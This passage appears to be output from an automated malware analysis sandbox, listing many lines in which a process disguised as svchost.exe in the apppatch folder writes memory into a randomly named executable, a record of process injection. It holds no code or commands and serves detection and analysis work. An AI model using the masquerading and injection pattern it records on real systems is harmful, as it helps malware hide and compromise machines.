    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1010000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1011000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1012000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1065000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1445000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2335000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2390000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2391000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2392000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2260000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2261000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2262000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2950000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2951000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2952000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29A5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2860000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2861000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2862000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2710000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2711000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2712000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2765000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 900000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 901000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 902000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 955000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2635000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2960000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2961000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2962000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2220000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2221000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2222000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2275000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: C45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 760000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 761000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 762000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 7B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1115000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2945000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2560000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2561000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2562000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3045000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2540000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2541000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2542000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2595000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 925000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2810000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2811000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2812000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2865000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1225000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1400000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1401000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1402000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1455000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: B15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1545000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2935000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2ED5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2435000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 930000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 931000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 932000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 985000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2615000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2330000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2331000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2332000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2385000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D90000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D91000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D92000Jump to behavior
